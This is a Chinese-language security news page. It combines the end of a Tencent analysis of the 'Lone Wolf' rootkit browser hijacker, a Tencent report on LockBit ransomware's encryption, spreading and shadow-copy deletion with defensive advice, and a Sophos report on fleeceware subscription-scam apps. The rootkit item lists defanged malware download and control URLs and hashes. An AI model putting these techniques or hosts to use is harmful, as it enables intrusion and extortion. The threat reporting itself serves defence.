分析发现,当前主页配置信息暂未下发,病毒暂未执行锁定用户浏览器主页的能力。推测当前病毒处于投递扩散期,保留了部分恶意行为暂不执行,当其感染量到达一定程度时,再随时下发劫持指令,实现浏览器劫持功能。 独狼Rootkit病毒可劫持数十款主流浏览器软件,包括IE、Chrome及其他国内用户常见的浏览器等等: 以插apc的方式向浏览器注入恶意代码: 我们通过对该病毒以往版本的分析,知道该病毒可以简单修改或升级配置,实现对浏览器主页的锁定功能,通常会将浏览器主页劫持到带推广id的2345广告站点。 当前病毒配置 简单构造病毒劫持配置文件desktop.ini 打开浏览器主页发现主页已被劫持到指定地址: 三、解决方案及安全建议 网上各种小众工具软件分发渠道良莠不齐,不少软件下载站暗藏玄机,很容易下载安装不需要的软件,甚至部分软件下载站还会推广危害严重的勒索软件。腾讯安全专家建议用户尽可能从相应软件的官方网站下载软件,或者通过腾讯电脑管家的软件管理功能下载需要的软件,启用腾讯电脑管家的权限雷达,帮助过滤软件包中存在的静默安装、恶意弹窗,管理开机自动运行等有损用户体验的情况发生。 腾讯电脑管家查杀UU页游助手 管家急救箱清理独狼Rootkit木马 IOCs MD5: 717d43d175430844467993ac4834396f 21a9876550dcebe12df9ec1011a01035 75f39f61ecc20a088766eb319d1ec9e2 7652ad8e2c69bef67c786eff3e9e3ef3 51991e47adb0b9160f077a0fc722f115 238b0180e66d16309efe50143b46560d 94f31a6d0d3243811705e0c9796cf060 8ec5ee614f76d0c547e2b76a52e8dae2 1374c22e5c861813c82bf6a1c8c159f9 Domain: www.jia7788.top update.uuyyzs.com URL hxxp://update.uuyyzs.com/query_action.php(UU页游助手云控地址) Hxxp://www.jia7788.top:7788/new/a109.exe(独狼病毒母体投递地址)
lockbit勒索病毒通过RDP弱口令爆破攻击,已有企业用户中招
感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/4j0dps2b-y4HIudZ1tNJRg 一、概述 腾讯安全威胁情报中心检测到国内有企业遭受lockbit勒索病毒攻击,被加密破坏的文件添加了.Lockbit后辍。该病毒出现于2019年末,传播方式主要利用RDP口令爆破。该病毒此前主要活跃在国外,观察当前病毒版本,其进程结束(防文件占用)列表内已出现国产安全软件,这也代表着该病毒团伙已将其狩猎范围拓展到了国内。 经分析,该病毒使用RSA+AES算法加密文件,加密过程采用了IOCP完成端口+AES-NI指令集提升其病毒工作效率,从而实现对文件的高性能加密流程。由于该病毒暂无有效的解密工具,被攻击后无法恢复文件,所以我们提醒各政企机构提高警惕。 二、分析 为了提升病毒读写文件效率,病毒通过采取IOCP完成端口模型,后续在工作者线程内读取完成消息队列,使用异步读写文件的方式实现病毒加密文件过程的高性能化。 在工作者线程内处理完成队列消息,根据IOCP_QUEUE_COMPLETECODE对文件数据进行加密,读写消息再投递。 同时为了进一步提升病毒加密过程效率,病毒运行后会检查CPU判断是否支持AES-NI指令集,加密时若支持相关指令则使用 aeskeygenassist,aesenc等加解密专用指令完成AES加密流程,否则使用其它常用计算指令完成加密流程。 加密文件前病毒会首先本地生成RSA密钥对信息,使用硬编码的RSA(N,E)对其进行加密,加密后的信息作为用户ID信息保存在相关注册表LockBit位置full键值内,同时将本地生成RSA密钥对中的RSA公钥(N,E)信息明文方式保存到注册表相关Pulbic位置内。被加密文件将添加0x610字节附加数据,分别为0x100字节的被加密AES密钥信息,0x500字节被加密用户RSA密钥信息,0x10固定串信息。 硬编码的RSA(N,E)信息,无私钥情况无法解密full内容,也无法解密文件 病毒会对每个文件使用BCryptGenRandom或CryptGenRandom方式生成0x16字节的AES密钥,随后开始尝试对文件进行加密。 当无法访问文件时,病毒会尝试更改文件所有者为自身进程,再次尝试访问文件。同时会尝试结束大量数据占用进程和服务(其内包括了国产安全软件相关进程,文档保护相关进程),加密时会避开大量系统关键目录,大量非数据类型后缀的文件。 病毒不加密以下白名单相关的文件和文件夹: 该病毒还会嗅探局域网内主机135,445端口是否开放,如果开放则尝试遍历其主机内的共享资源进行加密 加密文件结束后,文件均被添加.lockbit扩展后缀。由于病毒同时会删除系统卷影备份信息,被加密后无法通过磁盘恢复等方式找回文件。同时该病毒还会修改桌面壁纸显示勒索信息,留下名为Restore-My-Files.txt的勒索信,要求用户登录暗网缴纳赎金,之后获取解密工具,对应暗网地址则提供了文件试用解密功能,聊天购买解密工具议价等服务。 三、安全建议 企业用户: 1、尽量关闭不必要的端口,如:445、135,139等,对3389,5900等端口可进行白名单配置,只允许白名单内的IP连接登陆。 2、尽量关闭不必要的文件共享,如有需要,请使用ACL和强密码保护来限制访问权限,禁用对共享文件夹的匿名访问。 3、采用高强度的密码,避免使用弱口令密码,并定期更换。建议服务器密码使用高强度且无规律密码,并且强制要求每个服务器使用不同密码管理。网管可通过强制安全策略要求局域网所有服务器、终端系统使用强密码并设定密码过期策略。 4、对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器。 5、对重要文件和数据(数据库等数据)进行定期非本地备份。 6、教育终端用户谨慎下载陌生邮件附件,若非必要,应禁止启用Office宏代码。 7、在终端/服务器部署腾讯T-Sec终端安全管理系统,Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务平台,内网各节点漏洞应及时进行漏洞扫描修复。 8、使用腾讯T-Sec终端安全管理系统(腾讯御点,产品官网:https://s.tencent.com/product/yd/index.html)拦截病毒木马攻击。御点终端安全管理系统具备终端杀毒统一管控、修复漏洞统一管控,以及策略管控等全方位的安全管理功能,可帮助企业管理者全面了解、管理企业内网安全状况、保护企业安全。 个人用户: 1、可启用腾讯电脑管家,勿随意打开陌生邮件,关闭Office执行宏代码 2、打开电脑管家的文档守护者功能,利用磁盘冗余空间自动备份数据文档,即使发生意外,数据也可有备无患。 IOCs MD5 b65198ea45621e29ba3b4fbf250ff686 d2e3b3cbdfd40e549c281b285c7fe9bd 553d21ec9c4e8a08d072e50f3ae0afe1 1f4581b36253f0f5d63e68347d1744a7 94d7e268d4a1bc11f50b7e493a76d7a0 49250b4aa060299f0c8f67349c942d1c d5c5558214a0859227e380071925ee58
Sophos:至少有32款“吸费软件”应用 滥用 App Store免费试用机制
如果你以为没有什么比破坏计算机的恶意软件入侵更可怕,那么请你再想一想银行账户直接被提取的糟糕程度。Android和iOS上的几十个“吸费软件”应用现在能通过使用诱饵和交换策略,利用手机应用商店的试用机制,向用户收取巨额费用。原本购买时看似划算的事情,即使你在试用期结束前卸载了应用,也会很快变成一个昂贵的错误。 在本周发布的一份报告中,英国安全公司Sophos透露,有超过350万iOS用户安装了 “吸费软件”,这是一种相对较新的网络诈骗。 这些应用大多以图像编辑器、二维码和条码扫描器、图像和视频过滤应用以及与星座和算命相关的东西的形式出现。 它们的工作方式是,滥用试用软件的形式在移动应用商店上散播,本质上是向用户收取高额费用。当你下载一款这种盗版应用时,你可以在短时间内访问它的所有功能,一旦试用期满,该应用就会尝试获得许可向你收费。而由于大多数这些应用一开始并没有提供什么价值,所以很多人最终都会卸载掉这个应用,这时,他们就会认为不再收费。 某些应用的开发者利用了应用商店的政策,让他们在你卸载之前要求你做更多的许可工作。这让他们仍然可以向你的账户收费,通常是一次性支付少量的费用或廉价的月费,但这种吸费软件应用则更进一步,要求你支付高额的费用,通常是数百美元。 去年,Sophos发现了50多个被安装了不少于6亿次“吸费软件”,随后谷歌在得知这些应用存在后,将其全部清理掉了,但新的应用却依然不断冒出,在安装量上能够与一些最成功的合法应用相媲美。 Sophos示,苹果的App Store目前至少有32款盗版吸费应用,其操作手法与Play Store上的应用相同。只要3天的7天试用期一结束,这些应用就会收取9美元/周或30美元/月的费用,这两项费用加起来可以高达468美元或360美元/年。 这些App的下载量往往在50万到100万之间,特别是其中一款名为 “十二生肖大师Plus “的App,更是跻身于总收入最高的App之列,不知情的用户看到这些数字,就会以为这些应用的受欢迎程度就是衡量其价值的标准,于是就会下载。 Sophos的恶意软件分析师Jagadeesh Chandraiah指出,”应用发布商也有能力通过发布新的盗版应用和订阅政策,或者通过改变应用在App Store中的资料,将之前免费的应用转化为盗版应用,尽管苹果开发者政策禁止这种行为。” 避免上当受骗的最好方法是仔细检查描述页面和评论,同时养成每次卸载应用时都要检查账户是否有订阅的习惯。下面是Sophos发现的全部盗版软件应用列表: (稿源:cnBeta,封面源自网络。)